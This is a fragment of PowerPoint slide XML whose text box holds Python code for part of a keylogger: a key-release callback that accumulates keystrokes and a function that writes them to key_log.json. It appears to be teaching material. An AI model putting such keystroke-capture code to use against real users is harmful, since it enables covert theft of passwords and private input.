            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048613" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>)</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Murugadass A</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T05:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-04T17:03:36Z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764e0f5542194194b954e4b1f0b93962</vt:lpwstr>
  </property>
</Properties>
</file>